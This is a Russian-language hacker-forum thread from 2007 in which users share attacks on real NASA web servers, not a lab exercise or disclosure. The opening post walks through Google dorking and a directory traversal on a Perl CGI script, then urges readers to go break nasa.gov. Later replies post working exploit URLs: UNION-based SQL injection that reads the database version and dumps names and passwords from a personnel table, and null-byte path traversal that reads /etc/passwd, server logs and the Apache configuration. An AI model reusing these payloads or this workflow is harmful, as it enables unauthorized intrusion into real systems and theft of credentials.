ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Иследования Серверов Nasa.gov
  #1  
Старый 07.05.2007, 21:21
Аватар для m0liver
m0liver
Новичок
Регистрация: 28.04.2007
Сообщений: 5
Провел на форуме:
31286

Репутация: 32
По умолчанию Иследования Серверов Nasa.gov

И так друг мой хочу представить тебе придставить не глубокий анализ серверов NASA.
Головной целю не было зламать основной сервер nasa ето глупо и на 99% не реально
я хотел показать что сервера NASA очень уязвимы для хакерских атак.
Ну что начнём
иследования..... Хочу сразу сказать что без моего любимого google ничего бы не было
так что спасибо за то что ты есть!
Первый запрос который я ввёл был site:nasa.gov
гугл сразу ответил что нашол около 6 610 000 ухты ну что будет над чем посидет ;)
Ну что поехали дальше меня интересовало есть ли на сервере cgi скрипты соотвецтвено
site:nasa.gov filetype:cgi так их тоже многа что говорит о возможности проверки на дыры.
site:nasa.gov filetype:cgi .txt .exe .pdf ну и тут меня ожидал облом:(
Ничего интересного небыло.Ну нечего идём дальше так дальше мне
пришло в голову проверить Perl скрипти на уязвимости в инклудинге меня сразу превлекла
ссылка:
http://ghrc.msfc.nasa.gov/camex3-cgi...August+Day=236

несколько експерементов над скриптом я обнаружыл

http://ghrc.msfc.nasa.gov/camex3-cgi-bin/browse/cmx_table.pl?dc8

скрипт выдал ошыбку:

Failed opendir /server/ftp/pub/browse/camex3/lase: No such file or directory

значит скрипт читает директории... Я попробывал вот так:

http://ghrc.msfc.nasa.gov/camex3-cgi..../../../../etc

но на минуту меня ожыдало розчерования:(
Вместо листинга файлов etc мне выдало страничку без картинок:( Но открывши сорцы
документа я увидел нечто такого:

<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.gfslock
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.initpipe
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.ioperms.lck
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.java
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.pwd.lock
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.xlv_labd_fifo
......


Да мне показало страницу з etc файлами. Для проверки я вошол на фтп но сразу меня стретило привецтвия:

220-
************************************************** *****************************
WARNING! This is a U.S. Government computer.
This system is for the use of authorized users only. By
accessing and using the computer system you are consenting
to system monitoring, including the monitoring of keystrokes.

Unauthorized use of, or access to, this computer system may
subject you to disciplinary action and criminal prosecution.

************************************************** *****************************
220 GHRC: Public FTP Server ready...
Пользователь (microwave.nsstc.nasa.gov:(none)):


Переводить нету смысла брутить не стал пошол искать дальше что то интересное....

SQL Inj come back....

Ну чё з cgi & perl закончили идём смотреть php скрипты. И так запросим гугла вот так:
site:nasa.gov filetype:php mysql error и что мы видим сразу первая страница и SQL ошыбка

http://climate.gsfc.nasa.gov/viewPap...ct.php?id=455/
MYSQL query failed: SELECT * FROM publications WHERE id=455/. MYSQL Error 1064: You
have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '' at line 1

Я не буду показывать как делать SQL inj ето глупо документаций по даной теме море!
Напомню я лиш хочу показать уязвимые места сервера а не взламовать его!
Дале проверел в ColdFusion скрипте была SQL из красивой одклаткой ощибки:
http://www-robotics.jpl.nasa.gov/projects/projectImage.cfm?Project=1&Image=1'
Дале я остановился и пошол спат:)
The End
Ну вот и всё наверно хотя даная проверка длилась не больше полтора часа и думаю багов
ищё мгого и много так что дерзай и иди ламай nasa.gov и не забудь написать письмо з
амерекоской тюряги:) Всё удачи.
 
Ответить с цитированием

  #2  
Старый 07.05.2007, 21:24
Аватар для m0liver
m0liver
Новичок
Регистрация: 28.04.2007
Сообщений: 5
Провел на форуме:
31286

Репутация: 32
По умолчанию

Ребята прошу строго не судить учтите ето моя первая статия. Если можна просто прокоментировать где я неправ или что я не правильно написал спасиба.
 
Ответить с цитированием

  #3  
Старый 07.05.2007, 22:39
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию

Код:
http://climate.gsfc.nasa.gov/viewPaperAbstract.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
 
Ответить с цитированием

  #4  
Старый 07.05.2007, 22:59
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

http://climate.gsfc.nasa.gov/viewPaperAbstract.php?id=-455+union+select+1,2,3,4,5,6,7,8,version(),10,11,1 2/*

5.0.22-max

на статью не тянет.....
 
Ответить с цитированием

  #5  
Старый 07.05.2007, 23:33
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

И все бояны, уже запощены в разделе скулей, эту

http://climate.gsfc.nasa.gov/personnel/viewperson.php?id=99'+union+select+1,2,concat(fnam e,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23+from+personnel+limit+2,1/*

я больше месяца назад нашел.
 
Ответить с цитированием

  #6  
Старый 08.05.2007, 15:17
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от m0liver  
climate.gsfc.nasa.gov/viewPaperAbstract.php?id=455/
Эта скуль инъекция существует со времен царя-гороха...

1-ое... данные из БД никак не помогут ломануть сайт
2-ое и основное... сайт находится не на насовском серваке....

Т.Е. бесполезно... и ненужно... и не ты первый... я помню там 5-ый мускул... это не наса, а так... пежня...
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #7  
Старый 08.05.2007, 16:02
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

То что nasa- одна большая скуль известно по моему уже достаточно давно.
Докозательством того что на nase багов очень много может служить освещение оных в журнале Хацкер)
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #8  
Старый 09.05.2007, 01:06
Аватар для mysql
mysql
Новичок
Регистрация: 08.05.2007
Сообщений: 1
Провел на форуме:
6440

Репутация: 0
По умолчанию

password :
_http://ilrs.gsfc.nasa.gov/cgi-bin/satellite_missions/select.cgi?order=by_name&sat_code=../../../../../../../etc/passwd%00&sat_name=GIOVE-A&sat_no=0505101&tab_id=general

access log :
_http://ilrs.gsfc.nasa.gov/cgi-bin/satellite_missions/select.cgi?order=by_name&sat_code=../../../../../../../etc/httpd/logs/cddis_access_log%00&sat_name=GIOVE-A&sat_no=0505101&tab_id=general

http conf :
_http://ilrs.gsfc.nasa.gov/cgi-bin/satellite_missions/select.cgi?order=by_name&sat_code=../../../../../../../etc/httpd/conf/httpd.conf%00&sat_name=GIOVE-A&sat_no=0505101&tab_id=general
 
Ответить с цитированием

  #9  
Старый 09.05.2007, 18:33
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Honeypots - имхо. Такие проекты не будут делать такие простые баги. . . .там ssh фильтруеться. там права узеранны сильно . . .

Последний раз редактировалось KPOT_f!nd; 09.05.2007 в 18:35..
 
Ответить с цитированием

  #10  
Старый 09.05.2007, 18:45
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

там нету нечего, рут уже практически у всех каму не лень.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Шведы признали незаконной конфискацию серверов Pirate Bay Y.Dmitriy Мировые новости 0 04.04.2007 14:18
Проверка серверов, и вебсайтов на уязвимости NeitR1N0 Разное - Покупка, продажа, обмен 12 18.03.2006 16:50
У немецких пиратов изъяли пять серверов dinar_007 Мировые новости 0 08.12.2005 23:14



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ